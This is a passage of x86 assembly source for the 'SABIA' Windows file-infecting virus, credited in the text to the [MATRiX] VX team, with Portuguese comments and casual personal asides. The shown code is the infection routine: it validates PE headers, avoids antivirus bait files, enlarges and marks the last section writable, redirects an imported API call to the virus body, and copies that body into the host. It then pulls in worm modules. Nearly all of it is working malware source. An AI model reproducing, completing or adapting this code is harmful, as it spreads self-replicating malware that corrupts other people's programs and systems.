jz infectar@002
|
|||
|
|
|||
|
cmp word ptr [eax], 'ZM'
|
|||
|
jne infectar@004
|
|||
|
|
|||
|
cmp byte ptr [eax+24], 64
|
|||
|
jb infectar@004
|
|||
|
|
|||
|
lea ecx, [ebp+eax]
|
|||
|
mov ebx, [eax+60]
|
|||
|
add eax, ebx
|
|||
|
cmp eax, ecx
|
|||
|
jae infectar@004
|
|||
|
|
|||
|
mov esi, eax
|
|||
|
lodsw
|
|||
|
xor ax, 'EP' xor '??'
|
|||
|
xor ax, '??'
|
|||
|
jnz infectar@004
|
|||
|
|
|||
|
lodsw
|
|||
|
lodsw
|
|||
|
lodsw
|
|||
|
cmp ax, 3
|
|||
|
jbe infectar@004
|
|||
|
dec ax
|
|||
|
|
|||
|
; trabalhamos com WORD
|
|||
|
|
|||
|
and eax,0000ffffh
|
|||
|
mov ecx, 40
|
|||
|
sub edx, edx
|
|||
|
mul ecx
|
|||
|
mov ecx, [esi+108]
|
|||
|
add eax, ebx
|
|||
|
shl ecx, 3
|
|||
|
add ecx, eax
|
|||
|
add ecx, 120
|
|||
|
add ecx, [handle@004]
|
|||
|
|
|||
|
; ecx est<73> apontando para o header da ultima se<73><65>o
|
|||
|
|
|||
|
; se<73><65>o:
|
|||
|
; 0-8 nome
|
|||
|
; 8-12 espa<70>o ocupado na memoria
|
|||
|
; 12-16 rva da se<73>ao
|
|||
|
; 16-20 espa<70>o ocupado no arquivo
|
|||
|
; 20-24 offset para o inicio da se<73>ao
|
|||
|
; 36-40 flags da se<73>ao
|
|||
|
|
|||
|
mov eax, [esi+44]
|
|||
|
test eax, eax
|
|||
|
jz infectar@004
|
|||
|
mov edx, eax
|
|||
|
add edx, [ecx+12]
|
|||
|
|
|||
|
cmp dword ptr [ecx+8], 0
|
|||
|
je infectar@004
|
|||
|
cmp dword ptr [ecx+12], 0
|
|||
|
je infectar@004
|
|||
|
cmp dword ptr [ecx+16], 0
|
|||
|
je infectar@004
|
|||
|
cmp dword ptr [ecx+20], 0
|
|||
|
je infectar@004
|
|||
|
|
|||
|
; neste momento:
|
|||
|
; eax <20> a IMAGEBASE do arquivo
|
|||
|
; edx <20> a IMAGEBASE + o RVA da ultima se<73><65>o
|
|||
|
; ecx <20> um offset para o header da ultima se<73><65>o
|
|||
|
; esi <20> um offset para o header do PE mais 8 bytes (porque mais 8 bytes ?)
|
|||
|
; ebp <20> o tamanho do arquivo
|
|||
|
|
|||
|
mov edi, [handle@004]
|
|||
|
add ebp, edi
|
|||
|
sub ebp, 20
|
|||
|
push 0
|
|||
|
pop [handle@006]
|
|||
|
|
|||
|
infectar@005:
|
|||
|
|
|||
|
inc edi
|
|||
|
cmp edi, ebp
|
|||
|
jae infectar@004
|
|||
|
|
|||
|
cmp [handle@006], 20
|
|||
|
jae infectar@006
|
|||
|
|
|||
|
cmp word ptr [edi], 15ffh
|
|||
|
jne infectar@005
|
|||
|
|
|||
|
; evitar instru<72><75>es como: mov ax, 15ffh
|
|||
|
|
|||
|
cmp dword ptr [edi+2], eax
|
|||
|
jbe infectar@005
|
|||
|
cmp dword ptr [edi+2], edx
|
|||
|
jae infectar@005
|
|||
|
inc [handle@006]
|
|||
|
jmp infectar@005
|
|||
|
|
|||
|
infectar@006:
|
|||
|
|
|||
|
; aponta para a DWORD
|
|||
|
|
|||
|
inc edi
|
|||
|
|
|||
|
; se n<>s estamos aqui, provavelmente este deve ser um
|
|||
|
; arquivo verdadeiro, e nao um teste dos antivirus.
|
|||
|
; ele possui mais de 20 chamadas a DWORDS (CALL DWORD PTR [XxX])
|
|||
|
; que sao verdadeiras (pelo menos no meu calculo), isso
|
|||
|
; indica um codigo com muitas chamadas a api's, os
|
|||
|
; arquivos-isca dos antivirus (chamados de GOAT files) geralmente
|
|||
|
; tem apenas UMA chamada a api, provavelmente ExitProcess.
|
|||
|
|
|||
|
; est<73> na hora da infec<65><63>o :)
|
|||
|
|
|||
|
mov ebp, [esi+72]
|
|||
|
test ebp, ebp
|
|||
|
jz infectar@004
|
|||
|
lea ebx, [ebp+(offset sabia@memory - offset start)]
|
|||
|
|
|||
|
infectar@007:
|
|||
|
|
|||
|
lea ebp, [ebp*2]
|
|||
|
mov [esi+72], ebp
|
|||
|
cmp ebp, ebx
|
|||
|
jb infectar@007
|
|||
|
|
|||
|
; mem<65>ria geral aumentada...
|
|||
|
|
|||
|
mov ebp, [ecx+8]
|
|||
|
lea ebx, [ebp+(offset sabia@memory - offset start)]
|
|||
|
|
|||
|
infectar@008:
|
|||
|
|
|||
|
lea ebp, [ebp*2]
|
|||
|
mov [ecx+8], ebp
|
|||
|
cmp ebx, ebp
|
|||
|
ja infectar@008
|
|||
|
|
|||
|
; memoria da se<73><65>o aumentada...
|
|||
|
|
|||
|
mov ebp, [ecx+16]
|
|||
|
push ebp
|
|||
|
push dword ptr [ecx+20]
|
|||
|
lea ebx, [ebp+(offset sabia@end - offset start)]
|
|||
|
|
|||
|
infectar@009:
|
|||
|
|
|||
|
lea ebp, [ebp*2]
|
|||
|
mov [ecx+16], ebp
|
|||
|
cmp ebp, ebx
|
|||
|
jb infectar@009
|
|||
|
|
|||
|
; espa<70>o aumentado...
|
|||
|
|
|||
|
or [ecx+36], GENERIC_READ or GENERIC_WRITE
|
|||
|
|
|||
|
; imagebase salva
|
|||
|
|
|||
|
not eax
|
|||
|
mov dword ptr [(offset sabia@end + (offset img_base0 - offset start))], eax
|
|||
|
not eax
|
|||
|
mov dword ptr [(offset sabia@end + (offset img_base1 - offset start))], eax
|
|||
|
mov ebp, [ecx+12]
|
|||
|
add dword ptr [(offset sabia@end + (offset img_base1 - offset start))], ebp
|
|||
|
mov ebp, [esp+4]
|
|||
|
add dword ptr [(offset sabia@end + (offset img_base1 - offset start))], ebp
|
|||
|
|
|||
|
push dword ptr [edi]
|
|||
|
pop dword ptr [(offset sabia@end + (offset chamada@001 - offset start))]
|
|||
|
|
|||
|
; imagebase em eax
|
|||
|
|
|||
|
push dword ptr [(offset sabia@end + (offset img_base1 - offset start))]
|
|||
|
pop dword ptr [edi]
|
|||
|
add dword ptr [edi], (offset img_base1 - offset start)
|
|||
|
|
|||
|
; aumentando arquivo...
|
|||
|
|
|||
|
mov eax, [handle@002]
|
|||
|
add eax, (offset sabia@end - offset start)
|
|||
|
sub edx, edx
|
|||
|
mov ecx, 101
|
|||
|
div ecx
|
|||
|
sub edx, edx
|
|||
|
inc eax
|
|||
|
mul ecx
|
|||
|
mov [handle@002], eax
|
|||
|
; eax contem o novo valor
|
|||
|
|
|||
|
call IOB@001
|
|||
|
call IO@001
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz infectar@002
|
|||
|
|
|||
|
; agora so falta copiar o codigo para dentro do arquivo,
|
|||
|
; adicionando os valores que eu tinha salvo na pilha ao
|
|||
|
; offset do arquivo mapeado na memoria
|
|||
|
|
|||
|
; nao acredito que to escrevendo essas linhas at<61> essa hora
|
|||
|
; da madruga (s<>o 01:59), foi dia de malhar o judas, essas
|
|||
|
; coisas de igreja, cristo e etc... lembrei, p<>scoa;
|
|||
|
|
|||
|
; comi meu ovo de chocolate todo uns dias atras, hoje
|
|||
|
; fiquei roubando dos parentes :) .
|
|||
|
|
|||
|
; n<>o sou de ferro, vou dar uma pausa para um cigarrinho...
|
|||
|
; at<61> daqui a 5 minutos
|
|||
|
|
|||
|
; voltei
|
|||
|
|
|||
|
pop ebp
|
|||
|
add eax, ebp
|
|||
|
pop ebp
|
|||
|
add eax, ebp
|
|||
|
mov edi, eax
|
|||
|
mov esi, offset sabia@end
|
|||
|
mov ecx, (offset sabia@end - offset start)
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov dword ptr [esp+(4*7)], 1
|
|||
|
|
|||
|
IF DEBUG EQ TRUE
|
|||
|
pushad
|
|||
|
push 0
|
|||
|
call mena1
|
|||
|
db 'Arquivo infectado:',0
|
|||
|
mena1:
|
|||
|
push offset buffer@001
|
|||
|
push 0
|
|||
|
call [user@005]
|
|||
|
popad
|
|||
|
ELSE
|
|||
|
ENDIF
|
|||
|
|
|||
|
infectar@004:
|
|||
|
|
|||
|
call IOB@001
|
|||
|
|
|||
|
infectar@002:
|
|||
|
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
db 'SABI<42> ViRuS',13,10
|
|||
|
db 'Software provide by '
|
|||
|
db '[MATRiX] VX TeAm: Ultras, Mort, Nbk, Tgr, Del_Armg0, Anaktos',13,10
|
|||
|
db 'Greetz: All VX guy in #virus and Vecna for help us',13,10
|
|||
|
db 'Visit us at:',13,10
|
|||
|
db 'http://www.coderz.net/matrix',13,10
|
|||
|
|
|||
|
worm@001:
|
|||
|
|
|||
|
INCLUDE \VIRUS\SABIA\WORM.INC
|
|||
|
|
|||
|
worm@002:
|
|||
|
|
|||
|
INCLUDE \VIRUS\SABIA\MATRiX.INC
|
|||
|
|
|||
|
sabia@end:
|
|||
|
|
|||
|
db (offset sabia@end - offset start) dup(0)
|
|||
|
user@002 dd 0
|
|||
|
user@005 dd 0
|
|||
|
buffer@002 STARTUPINFO <0>
|
|||
|
buffer@003 PROCESS_INFORMATION <0>
|
|||
|
buffer@004 db MAX_PATH dup(0)
|
|||
|
buffer@005 WIN32_FIND_DATA <0>
|
|||
|
buffer@006 db MAX_PATH dup(0)
|
|||
|
handle@001 dd 0
|
|||
|
handle@002 dd 0
|
|||
|
handle@003 dd 0
|
|||
|
handle@004 dd 0
|
|||
|
handle@005 dd 0
|
|||
|
handle@006 dd 0
|
|||
|
handle@007 dd 0
|
|||
|
handle@008 dd 0
|
|||
|
handle@009 dd 0,0,0,0,0,0
|
|||
|
|
|||
|
sabia@memory:
|
|||
|
|
|||
|
dd offset $+4
|
|||
|
push 0
|
|||
|
API ExitProcess
|
|||
|
API GetProcAddress
|
|||
|
API GetModuleHandleA
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
db ?
|
|||
|
|
|||
|
end start
|
|||
|
end
|